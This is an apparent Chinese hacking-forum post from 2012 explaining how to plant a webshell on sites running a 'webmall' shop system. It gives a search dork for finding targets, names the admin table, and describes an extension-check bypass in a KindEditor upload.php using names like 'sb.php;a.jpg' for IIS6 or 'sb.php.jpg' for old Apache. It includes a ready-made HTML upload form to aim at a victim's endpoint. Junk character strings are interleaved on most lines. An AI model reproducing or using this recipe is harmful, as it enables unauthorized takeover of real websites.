关键字:inurl:webmall/detail.php?id
% s$ ~/ Z' V$ X0 H* @9 Y7 @6 O9 Y2 J# x1 |6 I7 v
数据表:pwn_base_admin
/ X$ W# v2 ` E. P 7 a3 D* X4 U& M+ h; N s( q2 T
关于拿shell
?* Q& I% p. h2 ^$ M) K3 P2 `
1 d3 G9 U, T$ @# T3 r首先登录后台admin.php
3 a7 M8 i, }3 G' ~/ h - V* i2 t3 ?& V
看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。 h" r( A. v3 l6 H
换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg
6 t& j" {* T/ B& }然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的
# b! c1 |* m* |: h<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php"> ; C H& E3 U/ P c
<input type="text" name="fileName" value="sb.php;a.jpg" /> " `# Z F- |; t! A- ?- j
<input type="hidden" name="attachPath" value="news/pics/" />
; X/ P( f3 @! A<input type="file" name="fileData" size="14" /></td>
' j& Z# u, f0 O' i<input type="submit" name="button" value="确定" /> . N5 q6 {! {6 n( a7 m* S. w; O* s
</form>
K3 M, u P4 I6 R5 A! ?
% K% c( K, _' }( Z首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。; x# u7 [6 Y5 Y0 Z4 K; A
% L2 E, o% P7 l' M7 O! R
|
发表于 2012-11-9 20:52:15
收藏
支持
反对